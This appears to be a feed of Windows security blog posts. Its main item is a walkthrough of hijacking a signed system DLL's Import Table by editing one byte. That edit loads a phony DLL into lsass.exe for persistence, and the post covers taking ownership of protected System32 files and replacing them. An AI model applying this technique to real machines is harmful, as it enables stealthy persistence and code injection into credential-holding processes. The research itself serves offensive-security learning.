However when used in WR mode WSH is much more comprehensive. I'd argue that as long as a service doesn't have impersonate privilege then it's effectively sandboxed if running with a WR token. MS already support sandbox escapes as a defended boundary so I'm not sure why WR sandboxes shouldn't also be included as part of that. For example if the trick using the Task Scheduler worked from a WR service I'd see that as circumventing a security boundary; however I don't work in MSRC so I have no influence on what is or is not fixed.

Of course in an ideal world you wouldn't use shared accounts at all. Versions of Windows since 7 have support for Virtual Service Accounts where the service user is the service SID rather than a standard service account and the SCM even limits the service's IL to High rather than System. Of course by default these accounts still have impersonate privilege, however you could also remove that.

Practical Reverse Engineering Solutions

27 December 2019 at 16:33
Hey, here I save all the solutions to the Windows kernel chapter of the Practical Reverse Engineering book. The exercises in this book are pretty insightful. The target audience of these posts are: people that want to read cool stuff about Windows kernel reverse engineering, people that want to learn how to break down reverse engineering tasks efficiently, and people that actually do the exercises and need a reference to the solutions.

AuxKlibQueryModuleInformation

27 December 2019 at 16:33
In this article I’m going over the solution to reverse engineering AuxKlibQueryModuleInformation. This exercise is one of the easiest exercises in the book. Exercise: In the walk-through, we mentioned that a driver can enumerate all loaded modules with the documented API AuxKlibQueryModuleInformation. Does this API guarantee that the returned module list is always up-to-date? Explain your answer. Next, reverse engineer AuxKlibQueryModuleInformation on Windows 8 and explain how it works. How does it handle the case when multiple threads are requesting access to the loaded module list?

PE Import Table hijacking as a way of achieving persistence - or exploiting DLL side loading

27 December 2019 at 03:56

Preface

In this post I describe a simple trick I came up with recently - something which is definitely nothing new, but as I found it useful and haven't seen it elsewhere, I decided to write it up.

What we want to achieve

So - let's consider backdooring a Windows executable with our own code by modifying its binary file OR one of its dependencies (so we are not talking about runtime code injection techniques or hooking, nor about abusing known persistence features like AppInit DLLs and the like).

Most of us are familiar with execution flow hijacking combined with:

We have probably heard of IAT hooking (in-memory), but how about doing it on-disk?

Import Table and DLL loading

Both EXE and DLL files make use of a PE structure called Import Table, which is basically a list of external functions (usually just WinAPI) the program is using, along with the names of the DLL files they are located in. This list can be easily reviewed with any PE analysis/editing tool like LordPE, PEView, PEStudio, PEBear and so on:

An excerpt of the calc.exe Import table displayed in PEView

These are the runtime dependencies resolved by the Windows PE loader upon image execution, making the new process call LoadLibrary() on each of those DLL files. Then the relevant entry for each individual function is replaced with its current address within the just-loaded library (the GetProcAddress() lookup) - this is the normal and usual way of having this done, taken care of by the linker during build and then by the Windows loader using the Import Table.

I need to mention that the process can also be performed directly by the program (instead of using the Import Table), by calling LoadLibrary() and then GetProcAddress() from its own code at some point (everyone who has written Windows shellcode knows this :D). This second way of loading DLLs and calling functions from them is sometimes referred to as dynamic linking (e.g. required for calling native APIs) and in many cases is a suspicious indicator (often seen in malicious software).
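
For reference, the dynamic equivalent of an ordinary static import looks roughly like this. This is just a generic illustration (using OutputDebugStringA, which also happens to feature later in this post), not code from the write-up.

#include <windows.h>

typedef void (WINAPI *OutputDebugStringA_t)(LPCSTR);

int main(void)
{
    // Resolve the DLL and the function at runtime instead of via the Import Table.
    HMODULE kernel32 = LoadLibraryA("kernel32.dll");
    if (!kernel32)
        return 1;

    OutputDebugStringA_t pOutputDebugStringA =
        (OutputDebugStringA_t)GetProcAddress(kernel32, "OutputDebugStringA");
    if (pOutputDebugStringA)
        pOutputDebugStringA("hello from a dynamically resolved import\n");

    FreeLibrary(kernel32);
    return 0;
}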

Anyway, let's focus on the Import Table and how we can abuse it.

Getting right to it - hijacking the Import Table and creating the malicious PoC DLL

WARNING: Please avoid experimenting with this on a production system before you develop and test a working PoC, especially when dealing with native Windows DLLs (you could break your system, you've been warned). Do it on a VM after making a backup snapshot first.

So, without any further ado, let's say that for some reason (🤭) we would like to inject our code into lsass.exe.

Let's start with having a procmon look to see what DLLs does lsass.exe load:

A procmon filter for DLL loads performed by lsass.exe
The results once the filter is applied

Now, we are going to slightly modify one of these DLLs.

When choosing, preferably we should go after one that is not signed (as we want to choose one with high chances of being loaded after our modification).

But in this case, to my knowledge, they are all signed (some with embedded signatures - with the Digital Signatures tab visible in the explorer properties of the file, others signed in the C:\Windows\System32\catroot\).

The execution policy on this system, however, is unrestricted... oh wait, that's what I thought up until finishing up this write up, but then for diligence, I decided to actually make a screenshot (after seeing it I was surprised it worked, please feel free to try this at home):

ANYWAY - WE WANT to see what happens OURSELVES - instead of making self-limiting assumptions, so we won't let the presence of the signature deter us. Also, in case the system decides that integrity is more critical than availability and decides to break, we have a snapshot of the PoC development VM.

The second factor worth considering when choosing the target DLL is the presence of an Import Table entry we would feel comfortable replacing (this will become self-explanatory).

So, let's choose C:\Windows\System32\cryptnet.dll (sha256: 723563F8BB4D7FAFF5C1B202902866F8A0982B14E09E5E636EBAF2FA9B9100FE):

Now, let's view its Import Table and see if there is an import entry which is most likely not used - at least during normal operations. Such an entry is the safest to replace (I guess now you see where this is going). We could just as well ADD an Import Table entry, but this is a bit more difficult, introduces more changes into the target DLL and is beyond this particular blog post.

Here we go:

api-ms-win-core-debug-l1-1-0.dll with its OutputDebugStringA is a perfect candidate.

As Import Tables contain only one reference to each particular DLL name, all relevant functions listed in the Import Table simply refer to such DLL name within the table.

Hence, if we replace a DLL that has multiple function entries in the Import Table, we would have multiple functions to either proxy or lose functionality and risk breaking something (depending on how lazy we are).

Thus, a DLL from which only one function is imported is a good candidate. If the DLL+function is a dependency that has most likely already been resolved by the original executable before it loaded the DLL we are modifying, it's even better. If it is a function that is most likely not to be called during normal operations (like debugging-related functions), it's perfect.

Now, let's work on a copy of the target DLL and apply a super l33t offensive binary hacking technique - hex editor. First, let's find the DLL name (we simply won't care about the Import Table structure):

Searching for the DLL name in the Import Table using HxD

Got it, looks good:

Looks like we found it

Now, our slight modification:

Now, just changing ONE byte, that's all we need

So now our api-ms-win-core-debug-l1-1-0.dll became api-ms-win-code-debug-l1-1-0.dll.

Let's confirm the Import Table change in PEView:

Now, let's fire up our favorite software development tool and create api-ms-win-code-debug-l1-1-0.dll with our arbitrary code.

DevC++, new project, DLL, C

Using a very simple demo, grabbing the current module name (the executable that loaded the DLL) and its command line, appending it into a txt file directly on C: (so by default only high integrity/SYSTEM processes will succeed):

One thing, though - in order for the GetModuleFileNameA() function from the psapi library (psapi.h) to properly link after compilation, -lpsapi needs to be added to the linker parameters:

Code can be copied from here https://github.com/ewilded/api-ms-win-code-debug-l1-1-0/blob/master/dllmain.c.
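
If you're building with DevC++'s MinGW toolchain outside the IDE, the equivalent command line would be something along these lines (the output name matches the phony DLL from the write-up; this is an assumption, not the author's exact build settings):

gcc -shared -o api-ms-win-code-debug-l1-1-0.dll dllmain.c -lpsapi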

OK, compile. Now, notice we used one export, called OutputFebugString (instead of OutputDebugString). This is because the linker would complain about the name conflict with the original OutputDebugString function that will get resolved anyway through other dependencies.

But since I wanted to have the Export Table in the api-ms-win-code-debug-l1-1-0.dll to match the entry from the cryptnet.dll Import Table, I edited it with HxD as well:

Fixing it

After:

Fixing it
Done

Normally we might want to test the DLL with rundll32.exe (but I am going to skip this part). Also, be careful when using VisualStudio, as it might produce an executable that by default will be x86 (and not x64) and for sure will produce an executable requiring visual C++ redistributables (even for a basic hello world-class application like this), while we might want to create portable code that will actually run on the target system.

What we are expecting to happen

We are expecting the lsass.exe process (and any other process that imports anything from cryptnet.dll) to load its tampered (by one byte!) version from its original location in spite of its digital signature being no longer valid (but again, lsass.exe and cryptnet.dll are just examples here).

We are also expecting that, once loaded, cryptnet.dll will resolve its own dependencies, including our phony api-ms-win-code-debug-l1-1-0.dll, which in turn, upon load (DllMain() execution) will execute our arbitrary code from within lsass.exe process (as well as from any other process that loads it, separately) and append our C:\poc.txt file with its image path and command line to prove successful injection into that process.

Deployment

OK, now we just need to deploy our version of cryptnet.dll (with the one Import Table entry hijacked with our phony api-ms-win-code-debug-l1-1-0.dll) along with our phony api-ms-win-code-debug-l1-1-0.dll itself into C:\Windows\System32\.

For this, obviously, we need elevated privileges (high integrity administrator/SYSTEM).

Even then, however, in this case we will face two problems (both specific to C:\Windows\System32\cryptnet.dll).

The first one is that C:\Windows\System32\cryptnet.dll is owned by TrustedInstaller and we (assuming we are not TrustedInstaller) do not have write/full control permissions for this file:

The easiest way to overcome this is to change the file ownership and then grant privileges:

The second problem we will most likely encounter is that the C:\Windows\System32\cryptnet.dll file is currently in use (loaded by multiple processes).

The easiest workaround for this is to first rename the currently used file:

Then deploy the new one (with hijacked Import Table), named the same as the original one (cryptnet.dll).

The screenshot below shows both new files deployed after having the original one renamed:

Showtime

Now, for diagnostics, let's set up procmon by using its cool feature - boot logging. Its driver will log events from the early stage of the system start process, instead of waiting for us to log in and run it manually. That boot log itself is, by the way, a great read:

Once we click Enable Boot Logging, we should see the following prompt:

We simply click OK.

Now, REBOOT!

And let's check the results.

This looks encouraging:

Oh yeah:

Let's run procmon to filter through the boot log. Upon running it we should be asked about saving and loading the boot log; we click Yes:

Now, the previous filter (Process name is lsass.exe and Operation is Load Image) confirms that our phony DLL was loaded right after cryptnet.dll:

One more filter adjustment:

To once more confirm that this happened:

Why this can be fun

DLL side loading exploitation

This approach is a neat and reliable way of creating "proxy" DLLs out of the original ones (differing by no more than one byte). Then we might only need to proxy one or a few functions, instead of worrying about proxying all or most of them.

Persistence

Introducing injection/persistence of our own code into our favorite program's/service's EXE/DLL.

All with easy creation of the phony DLL (just write in C) and a simple byte replacement in an existing file, no asm required.

Windows Library Code

9 December 2019 at 12:00
Intro I thought I would make a guide about Windows library code. The target audience are beginners that want to understand more about Windows reverse engineering, development and compilation. I tried to make this guide as simple as possible. A "Library" is a term used in computer science for a collection of pre-written code / variables. Libraries are pretty useful for developers because they save development time. There are 2 types of libraries: